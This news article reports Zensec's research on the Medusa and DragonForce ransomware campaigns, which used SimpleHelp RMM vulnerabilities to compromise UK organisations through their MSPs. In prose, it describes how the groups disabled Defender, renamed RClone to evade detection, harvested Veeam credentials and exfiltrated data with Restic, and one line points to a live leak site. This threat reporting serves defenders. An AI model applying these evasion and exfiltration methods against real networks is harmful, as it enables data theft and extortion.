Cybersecurity researchers at Zensec have exposed a sophisticated supply-chain attack campaign that weaponised trusted Remote Monitoring and Management (RMM) infrastructure to deploy ransomware across multiple UK organisations throughout early 2025.
The investigation reveals how two prominent ransomware-as-a-service groups exploited critical vulnerabilities in SimpleHelp RMM software to breach downstream customers through their managed service providers.
The attacks centred on three severe vulnerabilities in the SimpleHelp RMM platform: CVE-2024-57726, CVE-2024-57727, and CVE-2024-57728.
SimpleHelp, widely deployed by MSPs and software vendors for remote endpoint management, became a gateway for attackers when left unpatched.
The platform’s default configuration running with SYSTEM-level privileges granted threat actors unfettered control over victim networks once compromised, allowing them to bypass traditional security controls and move laterally with minimal friction.
SimpleHelp’s vendor had released patches and classified the vulnerabilities as severe, yet numerous organisations fell victim to exploitation throughout Q1 and Q2 2025.
The compromised RMM servers functioned as privileged staging points, enabling attackers to reach downstream customer environments through legitimate management channels that security tools inherently trust.
Medusa Ransomware Campaign
The Medusa ransomware group orchestrated a coordinated campaign targeting multiple UK organisations in Q1 2025.
After gaining initial access through compromised SimpleHelp instances, attackers deployed PDQ Inventory and PDQ Deploy in approximately half the observed incidents.
These legitimate IT management tools were weaponised to execute ransomware payloads named “Gaze.exe” or organisation-specific executables across victim networks.
Medusa’s operators demonstrated sophisticated defence evasion techniques, using base64-encoded PowerShell commands pushed through PDQ Deploy to disable Microsoft Defender and configure exclusions.
Network reconnaissance tools like netscan.exe enabled threat actors to enumerate hosts and prioritise high-value targets including domain controllers, file servers, and backup infrastructure.
Data exfiltration occurred in approximately 50 percent of Medusa incidents analysed, utilising RClone renamed as “lsp.exe” to evade detection.
The exfiltration tool was configured with specific filters targeting files over 1500 days old and under 1500MB, optimising for user data while avoiding unnecessarily large files.
Attackers systematically deleted RClone configuration files post-exfiltration to hinder forensic investigation.
The ransomware encrypted systems with the “.MEDUSA” extension and dropped ransom notes titled “!!!READ_ME_MEDUSA!!!.txt” on infected machines.
Medusa’s double extortion model manifested through their data leak site, where victims appeared with proof-of-life packs including screenshots, document previews, and browsable file trees designed to pressure organisations into payment.
DragonForce Ransomware Operations
DragonForce, a relatively new ransomware-as-a-service group established in 2023, executed similar campaigns throughout Q2 2025.
The Medusa leak site is functional at the time of writing with many victims published. The link is found at the top of the site hyperlinked.
Their methodology mirrored Medusa’s initial access vector through compromised SimpleHelp instances, though their tactical execution differed in key areas.
After establishing access via RMM compromise, DragonForce operators installed AnyDesk for interactive control and created local administrator accounts named “admin” to maintain persistence.
The group demonstrated particular interest in backup infrastructure, executing credential harvesting scripts like “Get-Veeam-Creds.ps1” to extract plaintext credentials from Veeam SQL password stores and configuration files.
DragonForce’s exfiltration methodology favoured Restic, an open-source backup tool, over RClone. The attackers configured Restic to transfer data to S3-compatible storage endpoints, specifically leveraging Wasabi cloud storage infrastructure. This approach created unauthorised off-site backups under attacker control.
The ransomware payload targeted Hyper-V VHDX files and encrypted systems with the “*.dragonforce_encrypted” extension.
File names were obscured with random character strings matching the original filename length. Ransom notes titled “readme.txt” directed victims to contact operators via TOX ID chat. DragonForce maintained both a public-facing blog for initial victim listings and a data leak site where stolen files became browsable and downloadable.
Supply Chain Security Imperative
These campaigns illuminate a fundamental vulnerability in modern IT ecosystems: organisations remain only as secure as their least-protected vendor.
When trusted third-party RMM infrastructure becomes compromised, attackers inherit legitimate access channels that bypass perimeter defences and evade security monitoring designed to detect anomalous connections.
The exploitation of SimpleHelp vulnerabilities despite available patches underscores persistent challenges in supply chain security and patch management across interconnected business relationships. Both Medusa and DragonForce capitalised on this trust model, transforming MSP management tools into weapons for ransomware deployment and data theft.
Organisations must urgently audit third-party remote access tools, verify vendor patch status, implement network segmentation to limit lateral movement, and enhance monitoring for unusual RMM activity.
The supply chain attacks documented by Zensec demonstrate that perimeter security alone provides insufficient protection when trusted management platforms become adversary infrastructure.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.